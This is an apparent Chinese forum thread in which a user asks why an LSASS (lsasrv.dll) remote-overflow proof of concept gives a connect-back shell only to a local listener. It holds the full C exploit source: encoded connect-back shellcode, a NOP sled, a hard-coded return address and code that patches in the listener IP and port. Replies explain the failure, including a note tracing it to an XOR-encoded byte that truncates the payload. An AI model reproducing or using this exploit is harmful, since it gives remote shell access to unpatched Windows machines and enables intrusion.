lsasrv.dll远程溢出的问题
http://hi.baidu.com/vipmsn/blog/item/c2a6db1bbc607fd5ac6e7529.html
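《菜鸟版exploit编写指南》之二lsasrv.dll远程溢出 我按照作者的讲解,在本机用nc监听,弹回了shell! 我测试在别的机器上监听,却失败了,不知道为什么,求达人帮忙解释一下!谢谢! 环境:windows 2000 sp4 en

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")

/*
 * Proof-of-concept for the LSASS DsRoleUpgradeDownlevelServer overflow, as
 * posted for an unpatched Windows 2000 SP4 machine.  Run it only against
 * systems you are authorised to test.
 *
 * The first argument of DsRoleUpgradeDownlevelServer is a wide (UTF-16)
 * string, so the payload is laid out as "xx 00 xx 00 ...": every payload
 * byte sits at an even index of buf and the odd bytes stay 0.  Two things
 * follow from that, and both matter for the question asked in this thread:
 *   - a payload byte of 0x00 forms a "00 00" wide NUL and ends the string
 *     right there, dropping everything behind it;
 *   - the connect-back IP/port are XOR-encoded with 0x99 before they are
 *     patched into the shellcode, so any address octet equal to 0x99 (153)
 *     encodes to 0x00.  192.168.135.153 ends in 153 - that is the failing
 *     case from the post; 127.0.0.1 encodes to e6 99 99 98 and works.
 */

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)(
    unsigned long, unsigned long, unsigned long, unsigned long,
    unsigned long, unsigned long, unsigned long, unsigned long,
    unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

#define MAXLEN 5000
char buf[2 * MAXLEN];   /* wide-string payload handed to LSASS */
char buf2[2000];        /* dummy argument for the remaining 11 parameters */

/* Byte offsets inside Shellcode[] of the XOR-encoded connect-back target. */
#define PORT_OFFSET 118     /* 2 bytes: htons(port) ^ 0x9999 */
#define IP_OFFSET   111     /* 4 bytes: inet_addr(ip) ^ 0x99999999 */

/* Wide-character indices inside buf (byte index = 2 * wide index). */
#define JMP_INDEX       2840  /* 90 90 EB 04: short jump over the address */
#define RET_INDEX       2844  /* overwritten return address */
#define SHELLCODE_INDEX 2848  /* decoder + encoded connect-back shellcode */

/*
 * XOR-0x99 encoded connect-back shellcode.  The first 23 bytes are the
 * decoder ("80 34 0B 99" = xor byte [ebx+ecx], 0x99, looped 0x125 times);
 * everything after it is decoded in place at run time, including the
 * IP/port bytes patched in by MShell().
 */
char Shellcode[] =
    "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
    "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
    "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
    "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
    "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
    "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99"
    "\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
    "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
    "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
    "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
    "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
    "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
    "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
    "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
    "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
    "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
    "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
    "\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
    "\xF9\x7E\xE0\x5F\xE0";

/*
 * Store n bytes at consecutive even byte positions of buf, starting at wide
 * index widx, i.e. as the low bytes of UTF-16 code units.  The odd (high)
 * bytes are left untouched; main() zeroes them beforehand.
 */
static void put_wide(size_t widx, const unsigned char *src, size_t n)
{
    size_t k;
    for (k = 0; k < n; k++)
        buf[2 * (widx + k)] = (char)src[k];
}

/*
 * Patch the connect-back target into Shellcode[].
 *
 * h: IPv4 address in dotted-quad form; p: decimal TCP port.  Both are
 * XOR-encoded with the shellcode key (0x99) so that the decoder restores
 * them together with the rest of the payload.
 *
 * Returns 0 on success.  Returns -1, leaving Shellcode[] untouched, when the
 * address or port cannot be parsed, or when any of the six encoded bytes is
 * 0x00: such a byte becomes a wide NUL inside the Unicode payload and cuts
 * the shellcode off at that point (192.168.135.153: last octet 0x99 -> 0x00).
 */
int MShell(char *h, char *p)
{
    unsigned long ip = inet_addr(h);
    char *end = NULL;
    long portnum = strtol(p, &end, 10);
    unsigned short port;
    unsigned char enc[6];
    size_t k;

    /* inet_addr() also returns INADDR_NONE for 255.255.255.255, which is not
       a usable connect-back address anyway. */
    if (ip == INADDR_NONE || end == p || *end != '\0' ||
        portnum <= 0 || portnum > 65535) {
        printf("MShell: bad connect-back address %s:%s\n", h, p);
        return -1;
    }

    port = (unsigned short)(htons((unsigned short)portnum) ^ (USHORT)0x9999);
    ip ^= (ULONG)0x99999999;

    /* Reject encodings that contain 0x00 before touching the shellcode. */
    memcpy(enc, &ip, 4);
    memcpy(enc + 4, &port, 2);
    for (k = 0; k < sizeof enc; k++) {
        if (enc[k] == 0x00) {
            printf("MShell: %s:%s encodes to a 0x00 byte (an address octet or "
                   "port byte equals 0x99); it would truncate the Unicode "
                   "payload - use another listener address/port\n", h, p);
            return -1;
        }
    }

    memcpy(&Shellcode[IP_OFFSET], &ip, 4);
    memcpy(&Shellcode[PORT_OFFSET], &port, 2);
    return 0;
}

/*
 * Build the overflow string and hand it to DsRoleUpgradeDownlevelServer.
 * Optional argv[1]/argv[2] select the connect-back host/port; the defaults
 * (127.0.0.1:1111) reproduce the original post.  Returns 1 on any failure.
 */
int main(int argc, char **argv)
{
    char *host = argc > 1 ? argv[1] : "127.0.0.1";
    char *port = argc > 2 ? argv[2] : "1111";
    /* nop / nop / jmp +4: skips the 4 return-address bytes into the shellcode */
    static const unsigned char jmp_stub[4] = { 0x90, 0x90, 0xEB, 0x04 };
    /* 0x7c536dbe, little-endian.  The original comment also lists 0x7FFA1571,
       but that value is never written.  Either way the address belongs to the
       author's OS build/language and must be re-checked for the target. */
    static const unsigned char ret_addr[4] = { 0xBE, 0x6D, 0x53, 0x7C };
    HMODULE hNetapi;
    size_t i;

    /* Constant today, but keeps a future shellcode swap from running off buf. */
    if (SHELLCODE_INDEX + sizeof(Shellcode) > MAXLEN) {
        printf("Shellcode does not fit into the payload buffer\n");
        return 1;
    }

    hNetapi = LoadLibrary("Netapi32.dll");
    if (!hNetapi) {
        printf("Can't load Netapi32.dll...\n");
        return 1;
    }
    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)
        GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
    if (!DsRoleUpgradeDownlevelServer) {
        printf("Can't get function DsRoleUpgradeDownlevelServer...\n");
        FreeLibrary(hNetapi);
        return 1;
    }

    /* Unicode NOP sled: 90 00 90 00 ... with a 00 00 terminator at the end. */
    memset(buf, 0, sizeof buf);
    for (i = 0; i < MAXLEN - 1; i++)
        buf[2 * i] = (char)0x90;

    put_wide(RET_INDEX, ret_addr, sizeof ret_addr);
    put_wide(JMP_INDEX, jmp_stub, sizeof jmp_stub);

    /* Shellcode connects back to host:port; refuse targets that encode to 0x00
       (the 192.168.135.153 case from the post) instead of sending a truncated
       payload. */
    if (MShell(host, port) != 0) {
        FreeLibrary(hNetapi);
        return 1;
    }

    /* sizeof(Shellcode) includes the terminating 0x00, which ends the wide
       string right after the payload.  (The post shows "= Shellcode;" here;
       that is presumably "Shellcode[i]" with the "[i]" eaten by the forum's
       BBCode.) */
    put_wide(SHELLCODE_INDEX, (const unsigned char *)Shellcode, sizeof Shellcode);

    DsRoleUpgradeDownlevelServer(
        (unsigned long)&buf[0],
        (unsigned long)&buf2[0], (unsigned long)&buf2[0],
        (unsigned long)&buf2[0], (unsigned long)&buf2[0],
        (unsigned long)&buf2[0], (unsigned long)&buf2[0],
        (unsigned long)&buf2[0], (unsigned long)&buf2[0],
        (unsigned long)&buf2[0], (unsigned long)&buf2[0],
        (unsigned long)&buf2[0]);

    FreeLibrary(hNetapi);
    return 0;
}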
发布于:2007-08-24 17:16
是因为一些中文系统下的跳转地址比如0x7ffa1571,在英文版的操作系统上是不存在的。
（补充：这个解释和楼主描述的现象对不上。代码里实际写进返回地址位置的是 be 6d 53 7c，即 0x7c536dbe，注释里的 0x7FFA1571 并没有被用到；而且两次测试溢出的都是本机、返回地址完全一样，只改了回连 IP，能回连到 127.0.0.1 就说明地址本身没问题。更可能的原因在 MShell：IP 和端口在塞进 shellcode 之前要和 0x99 异或，192.168.135.153 的末字节 153 = 0x99，异或后变成 0x00；缓冲区是 xx 00 形式的 Unicode 字符串，这个 0x00 和它后面的 00 凑成一个宽字符 NUL，字符串到此截断，后面的 shellcode 根本没送进去。127.0.0.1 编码后是 e6 99 99 98，没有 0 字节，所以能成功。换一个各字节都不是 0x99 的监听地址（端口同理）再试即可验证。）